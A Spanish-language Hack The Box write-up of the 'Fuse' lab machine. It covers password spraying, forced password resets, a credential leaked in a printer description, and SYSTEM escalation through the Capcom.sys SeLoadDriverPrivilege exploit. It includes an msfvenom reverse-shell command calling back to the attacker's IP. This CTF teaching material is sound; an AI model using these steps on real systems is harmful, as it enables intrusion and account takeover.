Table of Contents
Hack The Box: Fuse
Welcome to my detailed writeup of the medium difficulty machine “Fuse” on Hack The Box. This writeup will cover the steps taken to achieve initial foothold and escalation to root.
🕵️♂️ Initial Enumeration
Nmap
1$ rustscan -a 10.129.2.5 --ulimit 5000 -g
210.129.2.5 -> [139,135,88,80,53,464,445,389,636,593,3268,3269,5985,9389,49667,49666,49677,49678,49679,49707] 1$ nmap -p139,135,88,80,53,464,445,389,636,593,3268,3269,5985,9389,49667,49666,49677,49678,49679,49707 -sCV 10.129.2.5 -oN allPorts
2Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-29 22:56 CEST
3Stats: 0:01:35 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
4NSE Timing: About 96.88% done; ETC: 22:58 (0:00:00 remaining)
5Nmap scan report for 10.129.2.5
6Host is up (0.041s latency).
7
8PORT STATE SERVICE VERSION
953/tcp open domain Simple DNS Plus
1080/tcp open http Microsoft IIS httpd 10.0
11| http-methods:
12|_ Potentially risky methods: TRACE
13|_http-server-header: Microsoft-IIS/10.0
14|_http-title: Site doesnt have a title (text/html).
1588/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-29 19:10:14Z)
16135/tcp open msrpc Microsoft Windows RPC
17139/tcp open netbios-ssn Microsoft Windows netbios-ssn
18389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
19445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
20464/tcp open kpasswd5?
21593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
22636/tcp open tcpwrapped
233268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
243269/tcp open tcpwrapped
255985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
26|_http-server-header: Microsoft-HTTPAPI/2.0
27|_http-title: Not Found
289389/tcp open mc-nmf .NET Message Framing
2949666/tcp open msrpc Microsoft Windows RPC
3049667/tcp open msrpc Microsoft Windows RPC
3149677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3249678/tcp open msrpc Microsoft Windows RPC
3349679/tcp open msrpc Microsoft Windows RPC
3449707/tcp open msrpc Microsoft Windows RPC
35Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows
36
37Host script results:
38| smb-security-mode:
39| account_used: guest
40| authentication_level: user
41| challenge_response: supported
42|_ message_signing: required
43| smb2-security-mode:
44| 3:1:1:
45|_ Message signing enabled and required
46| smb-os-discovery:
47| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
48| Computer name: Fuse
49| NetBIOS computer name: FUSE\x00
50| Domain name: fabricorp.local
51| Forest name: fabricorp.local
52| FQDN: Fuse.fabricorp.local
53|_ System time: 2024-07-29T12:11:07-07:00
54| smb2-time:
55| date: 2024-07-29T19:11:04
56|_ start_date: 2024-07-29T19:07:02
57|_clock-skew: mean: 33m18s, deviation: 4h02m32s, median: -1h46m43sUDP
1$ sudo nmap --top-ports 1500 -sU --min-rate 5000 -n -Pn 10.129.2.5 -oN ../scan/allPorts.UDP
2Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-29 23:22 CEST
3Nmap scan report for 10.129.2.5
4Host is up (0.054s latency).
5Not shown: 1497 open|filtered udp ports (no-response)
6PORT STATE SERVICE
753/udp open domain
888/udp open kerberos-sec
9123/udp open ntp🌐 Web Enumeration
Por ahora hemos descubierto el dominio fabricorp.local y un subdominio fuse.fabricorp.local
Tiene un servicio web así que vamos a echarle un vistazo
1$ whatweb http://fabricorp.local
2http://fabricorp.local [200 OK] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/10.0], IP[10.129.2.5], Meta-Refresh-Redirect[http://fuse.fabricorp.local/papercut/logs/html/index.htm], Microsoft-IIS[10.0]
3http://fuse.fabricorp.local/papercut/logs/html/index.htm [200 OK] Country[RESERVED][ZZ], Frame, HTTPServer[Microsoft-IIS/10.0], IP[10.129.2.5], Microsoft-IIS[10.0], Title[PaperCut Print Logger : Print Logs]Parece que tiene algo que ver con un servicio de impresión. Vemos tres archivos.
- papercut-print-log-xxxx-xx-xx.csv
De los cuales conseguimos usuarios.
- pmerton
- tlavel
- sthompson
- bhult
También un nombre de impresora HP-MFT01
Y también nombres de ficheros interesantes
- backup_tapes
- Fabricorp01.docx
Con kerbrute podemos validar estos usuarios
12024/07/29 23:11:13 > [+] VALID USERNAME: tlavel@fabricorp.local
22024/07/29 23:11:13 > [+] VALID USERNAME: bhult@fabricorp.local
32024/07/29 23:11:13 > [+] VALID USERNAME: pmerton@fabricorp.local
42024/07/29 23:11:13 > [+] VALID USERNAME: sthompson@fabricorp.localDespués de enumerar mas, no encuentro nada, por lo cual voy a utilizar de contraseña los nombres de los documentos que se han imprimido
1$ cat passwords.txt
2mega_mountain_tape_request
3mega_mountain
4mega_mountain_tape
5Fabricorp01
6fabricorp01
7backup_tapes
8offsite_dr_invocation
9dr_invocation
10printing_issue_testPassword Spraying
Con nxc vamos a hacer password spraying, a ver si conseguimos alguna cuenta.
1$ nxc smb 10.129.2.5 -u users.txt -p passwords.txt --shares
2SMB 10.129.2.5 445 FUSE [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)
3SMB 10.129.2.5 445 FUSE [-] fabricorp.local\pmerton:mega_mountain_tape_request STATUS_LOGON_FAILURE
4SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bnielson:mega_mountain_tape_request STATUS_LOGON_FAILURE
5SMB 10.129.2.5 445 FUSE [-] fabricorp.local\tlavel:mega_mountain_tape_request STATUS_LOGON_FAILURE
6SMB 10.129.2.5 445 FUSE [-] fabricorp.local\sthompson:mega_mountain_tape_request STATUS_LOGON_FAILURE
7SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bhult:mega_mountain_tape_request STATUS_LOGON_FAILURE
8SMB 10.129.2.5 445 FUSE [-] fabricorp.local\pmerton:mega_mountain STATUS_LOGON_FAILURE
9SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bnielson:mega_mountain STATUS_LOGON_FAILURE
10SMB 10.129.2.5 445 FUSE [-] fabricorp.local\tlavel:mega_mountain STATUS_LOGON_FAILURE
11SMB 10.129.2.5 445 FUSE [-] fabricorp.local\sthompson:mega_mountain STATUS_LOGON_FAILURE
12SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bhult:mega_mountain STATUS_LOGON_FAILURE
13SMB 10.129.2.5 445 FUSE [-] fabricorp.local\pmerton:mega_mountain_tape STATUS_LOGON_FAILURE
14SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bnielson:mega_mountain_tape STATUS_LOGON_FAILURE
15SMB 10.129.2.5 445 FUSE [-] fabricorp.local\tlavel:mega_mountain_tape STATUS_LOGON_FAILURE
16SMB 10.129.2.5 445 FUSE [-] fabricorp.local\sthompson:mega_mountain_tape STATUS_LOGON_FAILURE
17SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bhult:mega_mountain_tape STATUS_LOGON_FAILURE
18SMB 10.129.2.5 445 FUSE [-] fabricorp.local\pmerton:Fabricorp01 STATUS_LOGON_FAILURE
19SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bnielson:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE
20SMB 10.129.2.5 445 FUSE [-] fabricorp.local\tlavel:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE
21SMB 10.129.2.5 445 FUSE [-] fabricorp.local\sthompson:Fabricorp01 STATUS_LOGON_FAILURE
22SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bhult:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE
23SMB 10.129.2.5 445 FUSE [-] fabricorp.local\pmerton:fabricorp01 STATUS_LOGON_FAILURE
24SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bnielson:fabricorp01 STATUS_LOGON_FAILURE
25SMB 10.129.2.5 445 FUSE [-] fabricorp.local\tlavel:fabricorp01 STATUS_LOGON_FAILURE
26SMB 10.129.2.5 445 FUSE [-] fabricorp.local\sthompson:fabricorp01 STATUS_LOGON_FAILURE
27SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bhult:fabricorp01 STATUS_LOGON_FAILURE
28SMB 10.129.2.5 445 FUSE [-] fabricorp.local\pmerton:backup_tapes STATUS_LOGON_FAILURE
29SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bnielson:backup_tapes STATUS_LOGON_FAILURE
30SMB 10.129.2.5 445 FUSE [-] fabricorp.local\tlavel:backup_tapes STATUS_LOGON_FAILURE
31SMB 10.129.2.5 445 FUSE [-] fabricorp.local\sthompson:backup_tapes STATUS_LOGON_FAILURE
32SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bhult:backup_tapes STATUS_LOGON_FAILURE
33SMB 10.129.2.5 445 FUSE [-] fabricorp.local\pmerton:offsite_dr_invocation STATUS_LOGON_FAILURE
34SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bnielson:offsite_dr_invocation STATUS_LOGON_FAILURE
35SMB 10.129.2.5 445 FUSE [-] fabricorp.local\tlavel:offsite_dr_invocation STATUS_LOGON_FAILURE
36SMB 10.129.2.5 445 FUSE [-] fabricorp.local\sthompson:offsite_dr_invocation STATUS_LOGON_FAILURE
37SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bhult:offsite_dr_invocation STATUS_LOGON_FAILURE
38SMB 10.129.2.5 445 FUSE [-] fabricorp.local\pmerton:dr_invocation STATUS_LOGON_FAILURE
39SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bnielson:dr_invocation STATUS_LOGON_FAILURE
40SMB 10.129.2.5 445 FUSE [-] fabricorp.local\tlavel:dr_invocation STATUS_LOGON_FAILURE
41SMB 10.129.2.5 445 FUSE [-] fabricorp.local\sthompson:dr_invocation STATUS_LOGON_FAILURE
42SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bhult:dr_invocation STATUS_LOGON_FAILURE
43SMB 10.129.2.5 445 FUSE [-] fabricorp.local\pmerton:printing_issue_test STATUS_LOGON_FAILURE
44SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bnielson:printing_issue_test STATUS_LOGON_FAILURE
45SMB 10.129.2.5 445 FUSE [-] fabricorp.local\tlavel:printing_issue_test STATUS_LOGON_FAILURE
46SMB 10.129.2.5 445 FUSE [-] fabricorp.local\sthompson:printing_issue_test STATUS_LOGON_FAILURE
47SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bhult:printing_issue_test STATUS_LOGON_FAILUREChanging Users Passwords with impacket-smbpasswd
Y encontramos varios usuarios válidos que deben cambiar sus contraseñas.
- bnielson:Fabricorp01
- tlavel:Fabricorp01
- bhult:Fabricorp01
Todos estos usuarios, al intentar autenticarnos como ellos, se nos devuelve el error NT_STATUS_PASSWORD_MUST_CHANGE
Pero esto no es problema, porque con herramientas como smbpasswd podemos cambiar la contraseña del usuario, aunque sería muy ruidoso, pero estamos en un CTF…
1$ impacket-smbpasswd bnielson@10.129.2.5 -newpass pointed123
2Impacket v0.11.0 - Copyright 2023 Fortra
3
4===============================================================================
5 Warning: This functionality will be deprecated in the next Impacket version
6===============================================================================
7
8Current SMB password:
9[!] Password is expired, trying to bind with a null session.
10[-] Some password update rule has been violated. For example, the password may not meet length criteria.Vamos a poner una password mas robusta
1$ impacket-smbpasswd bnielson@10.129.2.5 -newpass Pointed123@
2Impacket v0.11.0 - Copyright 2023 Fortra
3
4===============================================================================
5 Warning: This functionality will be deprecated in the next Impacket version
6===============================================================================
7
8Current SMB password:
9[!] Password is expired, trying to bind with a null session.
10[*] Password was changed successfully.Vamos a probar con nxc
1$ nxc smb 10.129.2.5 -u 'bnielson' -p 'Pointed123@'
2SMB 10.129.2.5 445 FUSE [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)
3SMB 10.129.2.5 445 FUSE [+] fabricorp.local\bnielson:Pointed123@Ningún usuario de la lista está en el grupo de Remote Management Users por lo cual no podemos utilizar herramientas como evil-winrm para conseguir una shell.
📂 Enumerating SMB
Cuando intento enumerar el SMB se ha reestablecido la pwd, por lo cual podemos deducir que hay un script por detrás que va reestableciendo la contraseña a estos usuarios.
1$ smbmap -H 10.129.2.5 -u bnielson -p 'ASsdasd23123123@'
2[+] IP: 10.129.2.5:445 Name: fabricorp.local
3 Disk Permissions Comment
4 ---- ----------- -------
5 ADMIN$ NO ACCESS Remote Admin
6 C$ NO ACCESS Default share
7 HP-MFT01 NO ACCESS HP-MFT01
8 IPC$ READ ONLY Remote IPC
9 NETLOGON READ ONLY Logon server share
10 print$ READ ONLY Printer Drivers
11 SYSVOL READ ONLY Logon server shareLo único interesante es el recurso print$ pero no encontramos nada de interés.
📂 Enumerating RPC and Gaining Foothold
Con rpcclient vamos a seguir enumerando usuarios, grupos y equipos.
Tenemos permisos suficientes, así que perfecto.
1$ rpcclient -U bnielson%'Wachiturro123@' 10.129.2.5
2rpcclient $> enumdomusers
3user:[Administrator] rid:[0x1f4]
4user:[Guest] rid:[0x1f5]
5user:[krbtgt] rid:[0x1f6]
6user:[DefaultAccount] rid:[0x1f7]
7user:[svc-print] rid:[0x450]
8user:[bnielson] rid:[0x451]
9user:[sthompson] rid:[0x641]
10user:[tlavel] rid:[0x642]
11user:[pmerton] rid:[0x643]
12user:[svc-scan] rid:[0x645]
13user:[bhult] rid:[0x1bbd]
14user:[dandrews] rid:[0x1bbe]
15user:[mberbatov] rid:[0x1db1]
16user:[astein] rid:[0x1db2]
17user:[dmuir] rid:[0x1db3]Vemos un grupo interesante.
group:[IT_Accounts] rid:[0x644]
Pero no tiene descripción.
1rpcclient $> querygroup 0x644
2 Group Name: IT_Accounts
3 Description:
4 Group Attribute:7
5 Num Members:2Como antes hemos visto que existe un servicio de impresión, podemos enumerar las impresoras y encontramos una credencial.
1rpcclient $> enumprinters
2 flags:[0x800000]
3 name:[\\10.129.2.5\HP-MFT01]
4 description:[\\10.129.2.5\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
5 comment:[]con nxc
1v1ce$1 STATUS_LOGON_FAILURE
2SMB 10.129.2.5 445 FUSE [+] fabricorp.local\svc-print:$fab@s3Rv1ce$1Y este usuario tiene permiso para conectarse mediante WinRM (por la cara)
1$ nxc winrm 10.129.2.5 -u svc-print -p '$fab@s3Rv1ce$1'
2WINRM 10.129.2.5 5985 FUSE [*] Windows 10 / Server 2016 Build 14393 (name:FUSE) (domain:fabricorp.local)
3WINRM 10.129.2.5 5985 FUSE [+] fabricorp.local\svc-print:$fab@s3Rv1ce$1 (Pwn3d!)Connecting via WinRM
1$ evil-winrm -i 10.129.2.5 -u svc-print -p '$fab@s3Rv1ce$1'
2
3Evil-WinRM shell v3.5
4
5Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
6
7Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
8
9Info: Establishing connection to remote endpoint
10*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami
11fabricorp\svc-print
12
13# Privilege Escalation
14Vemos que este usuario tiene el privilegio SeLoadDriverPrivilege, este privilegio ya lo he explotado varias veces, podemos hacer uso de un driver vulnerable especialmente diseñado para escalar privilegios y convertirnos en administradores.
15
16```shell
17*Evil-WinRM* PS C:\Users> whoami /priv
18
19PRIVILEGES INFORMATION
20----------------------
21
22Privilege Name Description State
23============================= ============================== =======
24SeMachineAccountPrivilege Add workstations to domain Enabled
25SeLoadDriverPrivilege Load and unload device drivers Enabled
26SeShutdownPrivilege Shut down the system Enabled
27SeChangeNotifyPrivilege Bypass traverse checking Enabled
28SeIncreaseWorkingSetPrivilege Increase a process working set EnabledHaciendo uso de este PoC , podemos ahorrarnos mucho trabajo. TarLogic hizo un post de la explotación de este caso muy interesante.
Primero, con msfvenom, nos creamos un payload de reverse shell para windows x64.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.71 LPORT=443 -f exe -o rev.exe
Ahora, nos descargamos el repositorio anteriormente mencionado, debemos de subir los archivos Capcom.sys , LoadDriver.exe , rev.exe y ExploitCapcom.exe
Como tenemos una consola con evil-winrm podemos subir directamente los archivos ya que es una funcionalidad adicional que incluye esta herramienta.
1*Evil-WinRM* PS C:\Users\svc-print\privesc> upload rev.exe
2
3Info: Uploading /home/pointedsec/Desktop/fuse/content/rev.exe to C:\Users\svc-print\privesc\rev.exe
4
5Data: 9556 bytes of 9556 bytes copied
6
7Info: Upload successful!
8*Evil-WinRM* PS C:\Users\svc-print\privesc> upload SeLoadDriverPrivilege/Capcom.sys
9
10Info: Uploading /home/pointedsec/Desktop/fuse/content/SeLoadDriverPrivilege/Capcom.sys to C:\Users\svc-print\privesc\Capcom.sys
11
12Data: 14100 bytes of 14100 bytes copied
13
14Info: Upload successful!
15*Evil-WinRM* PS C:\Users\svc-print\privesc> upload SeLoadDriverPrivilege/LoadDriver.exe
16
17Info: Uploading /home/pointedsec/Desktop/fuse/content/SeLoadDriverPrivilege/LoadDriver.exe to C:\Users\svc-print\privesc\LoadDriver.exe
18
19Data: 20480 bytes of 20480 bytes copied
20
21Info: Upload successful!
22*Evil-WinRM* PS C:\Users\svc-print\privesc> upload SeLoadDriverPrivilege/ExploitCapcom.exe
23
24Info: Uploading /home/pointedsec/Desktop/fuse/content/SeLoadDriverPrivilege/ExploitCapcom.exe to C:\Users\svc-print\privesc\ExploitCapcom.exe
25
26Data: 357716 bytes of 357716 bytes copied
27
28Info: Upload successful!
29*Evil-WinRM* PS C:\Users\svc-print\privesc> dir
30
31
32 Directory: C:\Users\svc-print\privesc
33
34
35Mode LastWriteTime Length Name
36---- ------------- ------ ----
37-a---- 7/29/2024 1:27 PM 10576 Capcom.sys
38-a---- 7/29/2024 1:27 PM 268288 ExploitCapcom.exe
39-a---- 7/29/2024 1:27 PM 15360 LoadDriver.exe
40-a---- 7/29/2024 1:27 PM 7168 rev.exeAhora, nos ponemos con netcat en escucha por el puert 443.
1$ sudo rlwrap -cEr nc -lvnp 443
2listening on [any] 443 ...Y en la máquina víctima, ejecutamos el LoadDriver.exe , debemos especificarle una ruta para cargar el drive en el registro, puede ser la que sea dentro de CurrentControlSet
1*Evil-WinRM* PS C:\Users\svc-print\privesc> .\LoadDriver.exe System\CurrentControlSet\MyService C:\Users\svc-print\privesc\Capcom.sys
2[+] Enabling SeLoadDriverPrivilege
3[+] SeLoadDriverPrivilege Enabled
4[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
5NTSTATUS: 00000000, WinError: 0Y ahora, ejecutamos el ExploitCapcom.exe, en la documentación dice de mover rev.exe a C:\Windows\Temp\rev.exe y ejecutar ExploitCapcom.exe sin parámetros, pero esto no me ha funcionado por alguna razón, así que le especificamos la ruta de rev.exe como parámetro.
1*Evil-WinRM* PS C:\Users\svc-print\privesc> .\ExploitCapcom.exe C:\Users\svc-print\privesc\rev.exe
2[+] Path is: C:\Users\svc-print\privesc\rev.exe
3[*] Capcom.sys exploit
4[*] Capcom.sys handle was obtained as 0000000000000064
5[*] Shellcode was placed at 000001AF5B210008
6[+] Shellcode was executed
7[+] Token stealing was successful
8[+] The SYSTEM shell was launched
9[*] Press any key to exit this program1$ sudo rlwrap -cEr nc -lvnp 443
2listening on [any] 443 ...
3connect to [10.10.14.71] from (UNKNOWN) [10.129.2.5] 50550
4Microsoft Windows [Version 10.0.14393]
5(c) 2016 Microsoft Corporation. All rights reserved.
6
7C:\Users\svc-print\privesc>whoami
8whoami
9nt authority\systemY ya hemos conseguido acceso como el usuario nt authority\system por lo cual hemos escalado privilegios y hemos terminado esta máquina.
Happy Hacking! 🚀
#HackTheBox #FUSE #Writeup #Cybersecurity #Penetration Testing #CTF #Domain User Enumeration #Kerbrute #Password Spraying #RPC Enumeration #EvilWinRM #Abusing SeLoadDriverPrivilege #Privilege Escalation #Exploit #Windows